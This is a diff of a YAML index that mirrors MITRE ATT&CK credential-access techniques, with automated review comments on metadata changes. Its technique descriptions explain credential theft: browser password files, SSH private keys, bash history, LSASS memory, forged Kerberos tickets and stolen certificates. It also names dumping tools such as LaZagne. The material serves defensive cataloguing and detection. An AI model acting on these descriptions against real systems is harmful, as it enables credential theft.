resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
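Review bot: the new T1557.004 Evil Twin entry has `x_mitre_detection: ''`, the single data source pair `Network Traffic: Network Traffic Content` / `Network Traffic: Network Traffic Flow`, and `atomic_tests: []` with no `identifier:` key, the same shape as T1558.005 above; if the missing `identifier` is intentional for techniques without an atomics directory that is fine, otherwise it should be added. The source_name `Australia ‘Evil Twin’` uses typographic quotes and is referenced literally as `(Citation: Australia ‘Evil Twin’)` in the description, so the generated YAML must be written and read as UTF-8 for the citation to resolve; an ASCII-normalising step anywhere in the pipeline would break that link. The description also inherits an upstream typo (`the adversary may able to monitor`), which belongs in a report against the ATT&CK data rather than a local patch to this mirrored index. On the T1556.007 side, the Azure AD to Entra ID wording changes correctly leave `(Citation: Azure AD Hybrid Identity)` and `(Citation: Azure AD Connect for Read Teamers)` untouched, since those are source_name keys that must still match external_references.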
@@ -54394,9 +55164,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
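Review bot: the two remaining Azure AD to Entra ID substitutions here are prose only, and `(Citation: Mandiant Azure AD Backdoors)` keeps its old name, which is required because it is a citation key rather than text; make sure no later search-and-replace for "Azure AD" is applied across the whole file, as it would rename these keys and orphan the citations. The `x_mitre_version` bump to 1.1 that accounts for the rename sits in the following hunk.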
@@ -54405,21 +55175,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
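Review bot: T1556.007 gets the same alphabetical key reordering as T1552 (`x_mitre_attack_spec_version`, `x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_detection`, `x_mitre_domains`, `x_mitre_is_subtechnique`, `x_mitre_modified_by_ref` ahead of `x_mitre_platforms`), while T1558.004, T1558.005, T1557.004 and T1555.003 in the same file keep spec version and modified_by_ref at the tail after `object_marking_refs`. Two key orders within one regenerated file is a sign the generator is passing through upstream serialization order; normalizing that once would make future ATT&CK refreshes produce content-only diffs. The substantive change here is the platform substitution (`Azure AD`, `Google Workspace`, `Office 365` replaced by `Office Suite`, `Identity Provider`) and the 1.0 to 1.1 version bump, identical to T1552.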
@@ -54459,55 +55230,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
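Review bot: the deletions at the top of T1555.003 (platforms, domains, contributors, object_marking_refs, id, type, created, created_by_ref, external_references) are not lost data: each of them is re-added lower in the object in the following hunks, so this pair of blocks is a reorder plus the `modified` bump to 2024-08-15. The `x_mitre_attack_spec_version: 2.1.0` removed from T1556.007 at the start of this hunk is the counterpart of the 3.2.0 line inserted near its kill_chain_phases, so that entry keeps its spec version too. When reviewing, compare the removed and re-added external_references pairwise; the only differences visible are ordering (GitHub Mimikittenz moves from last to first) and the added `revoked: false`.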
@@ -54537,6 +55263,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
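Review bot: the `x_mitre_detection` context for T1555.003 shows the Chrome profile path split over three lines with a bare `.` opening the third (`AppData\Local\Google\Chrome\User`, `Data\Default\Login Data`, `. Monitor file read events ...`), which looks like an inline-code span that lost its markup; because the scalar is single-quoted the backslashes are literal and harmless, but confirm the path is one contiguous string in the generated file. The re-added contributors match the four names removed earlier from the same object, so attribution is unchanged.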
@@ -54546,18 +55278,53 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests:
- name: LaZagne.py - Dump Credentials from Firefox Browser
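Review bot: `spec_version: '2.1'` and `x_mitre_permissions_required: [User]` are removed from T1555.003 with no replacement while `x_mitre_attack_spec_version` jumps from 2.1.0 to 3.2.0; confirm nothing in this repo still reads `x_mitre_permissions_required`, because the same drop recurs for T1552.003 and T1552.006 later in the patch. The rest of the hunk is a reorder (x_mitre_platforms, type/id/created, external_references and object_marking_refs all move to the end of the object), which makes the diff far larger than the actual change; emitting keys in a fixed order would keep future regenerations reviewable.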
@@ -54597,7 +55364,7 @@ credential-access:
elevation_required: true
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -54634,23 +55401,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
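Review bot: every changed line in this hunk is a pure move (x_mitre_contributors, x_mitre_deprecated, x_mitre_domains and x_mitre_is_subtechnique shift above x_mitre_detection and x_mitre_platforms) with no value altered, so the DHCP Spoofing object is semantically identical before and after; if the regeneration script can sort keys deterministically, hunks like this one disappear entirely.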
@@ -54683,21 +55450,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
@@ -54708,7 +55474,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
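Review bot: the only substantive change is the `Azure AD` to `Entra ID` rename inside the T1552.004 description; the citation key `Microsoft Primary Refresh Token` and the surrounding sentence are untouched, so this is safe. Visible in the unchanged context, `* nix-based systems` has a stray space (it should read `*nix-based`), most likely a Markdown-escaping artifact from the upstream text that could be normalized in the same pass.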
@@ -54742,7 +55508,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -54770,7 +55536,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
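Review bot: the Kaspersky Careto link is swapped for a web.archive.org snapshot but `Retrieved July 5, 2017` is left as-is, whereas the solution_monitor_dhcp_scopes entry earlier in this patch received both a new archive URL and a new retrieved date (September 12, 2024); pick one convention for archived references, since a 2017 retrieval date on a 2014 snapshot URL is confusing to anyone following the citation.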
@@ -54781,9 +55547,8 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests:
- name: Discover Private SSH Keys
@@ -54998,7 +55763,7 @@ credential-access:
name: sh
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
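Review bot: the `modified` timestamp for T1557.001 moves backwards, from 2023-04-25 to 2022-10-25, and in the following hunk its `x_mitre_attack_spec_version` stays at 3.0.0 rather than going to 3.2.0 like its neighbours; this reads as if the object was taken from an older STIX bundle than the rest of the patch. Check the source before merging, because the same backwards jump appears for T1558.001 and T1556.008 further down.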
@@ -55106,12 +55871,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -55148,6 +55912,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -55160,7 +55925,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
@@ -55210,12 +55975,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests: []
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -55241,6 +56005,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
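Review bot: here `x_mitre_attack_spec_version: 3.2.0` is inserted immediately after kill_chain_phases, i.e. in alphabetical key order, while in the T1555.003 and T1557.003 objects above it sits at the end after object_marking_refs; two key orders inside one patch suggests two different serializers (or a partially sorted emitter) produced this file. Not a correctness problem, but it guarantees spurious diffs on every regeneration.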
@@ -55256,18 +56021,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
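Review bot: the platform list for T1110.003 drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider`, with the version going 1.5 to 1.6; that is consistent with the upstream ATT&CK platform consolidation, but any index or filter in this repo keyed on the old platform strings will silently stop matching these techniques, so per-platform index generation should be re-run and its output checked as part of this change rather than assumed.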
@@ -55294,14 +56059,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -55312,13 +56074,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -55332,6 +56094,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -55342,12 +56105,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -55422,7 +56185,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests: []
T1558.001:
@@ -55468,7 +56230,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
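Review bot: `modified` for T1558.001 goes from 2022-04-25 back to 2020-11-05; a regeneration should never move a timestamp backwards, so either the source bundle is stale for this object or the field is being read from the wrong place. The following hunk, where the same object loses its spec version fields entirely, points the same way.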
@@ -55503,16 +56265,14 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests: []
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
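Review bot: `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are both deleted from T1558.001 with nothing added back, so after this patch T1558.001 ends up as the only object in this section without an `x_mitre_attack_spec_version` at all; every other object keeps one. Together with the modified date moving back to 2020 this object looks stale and should be re-exported. The T1649 edit in the same hunk (`Azure AD` to `Entra ID` in the description, citation keys unchanged) is fine.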
@@ -55522,21 +56282,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -55585,33 +56347,11 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1649
atomic_tests: []
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
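Review bot: this hunk deletes id, type, created, created_by_ref, object_marking_refs, x_mitre_platforms, x_mitre_domains and the complete external_references block of T1552.003 without adding replacements; they are re-added in the next hunk of the same object, so nothing is actually lost, but a reviewer has to read both hunks side by side to confirm that (the slideshare reference, for instance, comes back there with a different URL and retrieved date). At the top of the hunk, removing `x_mitre_attack_spec_version: 3.1.0` and `x_mitre_modified_by_ref` from T1649 is likewise a move with a bump to 3.2.0, since both were inserted after kill_chain_phases in the previous hunk.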
@@ -55626,20 +56366,38 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
